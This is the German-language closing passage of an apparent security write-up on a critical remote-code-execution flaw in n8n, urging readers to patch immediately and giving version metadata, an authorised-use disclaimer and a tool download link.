Die einfache Lösung: Aktualisieren Sie sofort auf eine gepatchte Version. Es gibt keine Ausrede, anfällig für eine kritische RCE zu bleiben, wenn Patches verfügbar sind.


Dokumentenversion

|- Version: 1.02 |- Erstellungsdatum: December 18, 2025 |- Zuletzt aktualisiert: December 26, 2025

  • Status: Vollständig
  • Autor: The StingR / TechSquad Inc.
  • Organisation: TechSquad Inc.

Haftungsausschluss

Dieses Dokument dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitsbewertungen. Unbefugter Zugriff auf Computersysteme ist illegal. Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie Systeme testen, bewerten oder auf Systeme zugreifen, die Ihnen nicht gehören.


⚠️ DENKEN SIE DARAN: Aktualisieren Sie Ihre n8n-Instanzen sofort, wenn Sie anfällige Versionen ausführen.

Tool herunterladen